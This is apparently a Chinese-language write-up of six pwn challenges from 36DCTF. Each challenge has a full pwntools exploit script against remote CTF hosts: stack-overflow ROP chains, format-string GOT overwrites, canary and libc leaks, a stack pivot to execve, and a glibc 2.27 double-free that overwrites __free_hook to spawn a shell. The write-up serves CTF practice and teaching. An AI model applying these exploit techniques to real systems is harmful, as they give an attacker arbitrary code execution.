写一下 36DCTF 的 6 个 PWN 题，估计有些题的做法和预期解不一样。
签到题
简单的栈溢出, 在BSS上写上一个/bin/sh字符串即可
from pwn import *

# Python 2 pwntools script: str and p64() output are concatenated directly.
io = remote('124.156.121.112', 28065)
context.log_level = 'DEBUG'
binary = ELF('./main')

POP_RDI_RET = 0x04006D3
scratch = binary.bss() + 0x100   # writable BSS slot that receives the second line

# Overflow: 0x20-byte buffer plus 8 bytes of saved rbp, then the chain
# gets(scratch) -> system(scratch); the second line is what gets() stores.
rop = ''.join([
    p64(POP_RDI_RET), p64(scratch), p64(binary.plt['gets']),
    p64(POP_RDI_RET), p64(scratch), p64(binary.plt['system']),
])
io.sendline('U' * (0x20 + 8) + rop)
io.sendline('/bin/sh\x00')
io.interactive()
然后远程 Docker 环境过滤了空格，用 `base64<flag`（不含空格）可以打印出 flag。
baby_fmtstr
这个题我就比较……，题目不难：看到一个 printf 的格式化字符串漏洞，再看了一眼 GOT 表可写，然后直接把 read 的 GOT 地址爆破 4 bit 改成 one_gadget，概率 1/16。
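from pwn import *

# Python 2 pwntools script: str and p64() output are concatenated directly.
# Drives the remote target only; the original also spawned process('./main')
# and immediately rebound the handle, orphaning that local child. The unused
# libc ELF load from the original is dropped as well.
io = remote('124.156.121.112', 28086)
binary = ELF('./main')

read_got = binary.got['read']

# Format-string write: two %hhn writes whose cumulative printed length is
# 82 and then 164, stored through the pointers supplied as args 12 and 13.
fmt = '%82c%12$hhn' + '%82c%13$hhn'
fmt = fmt.ljust(0x20, '\x00')               # pad so the pointers below land on args 12/13
fmt += p64(read_got + 1) + p64(read_got)    # arg 12 -> read@got+1, arg 13 -> read@got

io.sendline(fmt)
io.sendline('FMYY')   # second input; per the writeup this succeeds 1 time in 16
io.interactive()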
MagicString
同样往bss上写/bin/sh字符串然后getshell
from pwn import *

# Python 2 pwntools script: str and p64() output are concatenated directly.
io = remote('124.156.121.112', 28021)
binary = ELF('./main')

POP_RDI_RET = 0x400733
BSS_SLOT = 0x601060   # writable address that receives the second line

# 0x2A0-byte buffer plus saved rbp, then gets(BSS_SLOT) followed by system(BSS_SLOT).
rop = ''.join([
    p64(POP_RDI_RET), p64(BSS_SLOT), p64(binary.plt['gets']),
    p64(POP_RDI_RET), p64(BSS_SLOT), p64(binary.plt['system']),
])
io.sendline('U' * (0x2A0 + 8) + rop)
io.sendline('/bin/sh\x00')
io.interactive()
MengXinStack
简单的栈题，泄露了 canary 和 libc 就足够。
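from pwn import *

# Python 2 pwntools script: str and p64() output are concatenated directly.
# Drives the remote target only; the original also spawned process('./main')
# and immediately rebound the handle, orphaning that local child.
io = remote('124.156.121.112', 28051)
binary = ELF('./main')
libc = ELF('./libc-2.23.so')
context.log_level = 'DEBUG'

# Leak 1: 0x25 bytes run over the canary's NUL low byte, so the echo after
# 'FMYY' carries the remaining 7 canary bytes followed by a stack address.
io.sendafter('hello?', 'U' * 0x25 + 'FMYY')
io.recvuntil('FMYY')
canary = u64(io.recv(7).rjust(8, '\x00'))   # put the NUL low byte back
log.info('Canary:\t' + hex(canary))
stack = u64(io.recv(6).ljust(8, '\x00')) - 304


def frame(ret_bytes):
    """Overflow body: 0x28-byte buffer, canary, 0x10 padding, saved-rbp slot = stack, then *ret_bytes*."""
    return '\x00' * 0x28 + p64(canary) + '\x00' * 0x10 + p64(stack) + ret_bytes


# Two-byte partial overwrite of the return address; presumably re-enters the
# input loop so a second leak is possible -- confirm against the binary.
io.send(frame('\xF0\xD7'))

# Leak 2: same trick with a longer fill; the bytes after 'FMYY' hold
# __libc_start_main+240, from which the libc base follows.
io.send('U' * 0x44 + 'FMYY')
io.recvuntil('FMYY')
libc_base = u64(io.recv(6).ljust(8, '\x00')) - libc.sym['__libc_start_main'] - 240
log.info('LIBC:\t' + hex(libc_base))

rce = libc_base + 0xF1147   # libc-2.23 offset taken from the original script
io.send(frame(p64(rce)))
io.interactive()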
tang
单字节修改，多次利用格式化字符串取得 canary、libc 和 PIE；然后不清楚为什么 rce 远程打不通，于是栈迁移到 bss 段，system 也不通，换成 execve 就行了。
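#coding=utf-8
from pwn import *

# Python 2 pwntools script: str and p64() output are concatenated directly,
# and libc.search(...).next() is the Python 2 iterator protocol.
# Drives the remote target only; the original also spawned process('./main')
# and immediately rebound the handle, orphaning that local child. The unused
# `rce` and `ret` constants of the original are dropped.
io = remote('124.156.121.112', 28017)
binary = ELF('./main')
libc = ELF('./libc-2.23.so', checksec=False)
context.log_level = 'DEBUG'

# Round 1: the format string prints stack argument 9, the canary.
io.sendlineafter('你怎么了?\n', '%9$p')
canary = int(io.recv(18), 16)
io.sendafter('烫烫烫烫\n', 'FMYY')

# Overflow body that keeps the canary intact and changes only the low byte of
# the slot after saved rbp (0x03); by analogy with the final payload below that
# slot is the return address, presumably so main re-prompts -- confirm against
# the binary.
loop_back = '\x00' * 0x38 + p64(canary) + '\x00' * 0x10 + p64(0) + '\x03'
io.sendafter('远一点!\n', loop_back)

# Round 2: argument 23 is __libc_start_main+240; derive the libc base.
io.send('%23$p')
io.recvline()
libc_base = int(io.recv(14), 16) - 240 - libc.sym['__libc_start_main']

binsh = libc_base + libc.search('/bin/sh').next()
execve = libc_base + libc.sym['execve']
pop_rdx_ret = libc_base + 0x01B92
io.sendafter('烫烫烫烫\n', 'FMYY')
io.sendafter('远一点!\n', loop_back)

# Round 3: argument 11 is main+100; derive the PIE base and the gadgets.
io.sendafter('你怎么了?\n', '%11$p')
pie = int(io.recv(14), 16) - 100 - binary.sym['main']
leave_ret = pie + 0x9CA
pop_rdi_ret = pie + 0xB43
pop_rsi_r15 = pie + 0xB41
target = pie + (0x201040 + 0x108)   # BSS address the stack is pivoted to

# The 0x108-byte buffer is filled with an execve(binsh, 0, 0) chain ...
chain = ''.join([
    p64(pop_rdi_ret), p64(binsh),
    p64(pop_rdx_ret), p64(0),
    p64(pop_rsi_r15), p64(0), p64(0),
    p64(execve),
])
io.sendafter('烫烫烫烫\n', '\x00' * 0x108 + p64(0) + chain)
# ... and the overflow sets saved rbp = target, return address = leave; ret,
# which moves rsp onto that chain.
io.sendafter('远一点!\n', '\x00' * 0x38 + p64(canary) + '\x00' * 0x10 + p64(target) + p64(leave_ret))
io.interactive()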
baby_heap
入门的2.27堆,难度不高,多调试几次就行了
1 | #coding=utf-8 |
2 | from pwn import* |
def new(content):
    """Menu option 1: allocate a chunk and send *content* as its data (no newline appended)."""
    choose = p.sendlineafter
    choose('>>', '1')
    p.sendafter('your 36D:', content)
def free(index):
    """Menu option 2: free the chunk at *index*."""
    choose = p.sendlineafter
    choose('>>', '2')
    choose('index:', str(index))
def show(index):
    """Menu option 3: print the chunk at *index*; the caller reads the reply."""
    choose = p.sendlineafter
    choose('>>', '3')
    choose('index:', str(index))
12 | |
def modify(target, content):
    """Write *content* at the address *target* by freeing index 1 twice.

    Index 1 is freed twice, then three allocations follow: the first stores
    *target* in the freed chunk, the second consumes the duplicate, and the
    third is handed *target* and receives *content*. Relies on the glibc 2.27
    heap behaviour the writeup describes; *target* and *content* must include
    their own trailing newline.
    """
    free(1)
    free(1)
    for data in (target, 'FMYY\n', content):
        new(data)
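# Drives the remote target only; the original also spawned process('./main')
# and immediately rebound p, orphaning that local child.
p = remote('124.156.121.112', 28060)
libc = ELF('./libc-2.27.so', checksec=False)
context.log_level = 'DEBUG'

# Five chunks, indices 0-4; new() sends data raw, so callers add the newline.
for _ in range(5):
    new('FMYY\n')

# Heap leak: free 1, then free 0 twice, and show(0) prints a pointer into the
# heap (presumably the freed chunk's forward pointer -- confirm with a debugger).
free(1)
free(0)
free(0)
show(0)
heap_base = u64(p.recvuntil('\n', drop=True).ljust(8, '\x00')) - 0x10 - 0x250
log.info('HEAP:\t' + hex(heap_base))
# --------------------
new(p64(heap_base + 0x270) + '\n')   # point the duplicated chunk at heap+0x270
new(p64(0) + p64(0xB1))              # looks like a fake chunk header (size 0xB1)
new('FAKE\n')
free(2)
modify(p64(heap_base + 0x18) + '\n', p64(0xFF00) + '\n')
free(7)
show(7)

# libc leak: the reply holds a libc pointer ending in 0x7F; the offset to
# __malloc_hook (0x60 + 0x10) is taken from the original script.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8, '\x00')) - 0x60 - 0x10 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc.sym['__free_hook'] + libc_base
rce = libc_base + 0x4F322   # libc-2.27 offset taken from the original script
modify(p64(free_hook) + '\n', p64(rce) + '\n')
free(4)   # this free() goes through the overwritten __free_hook
p.interactive()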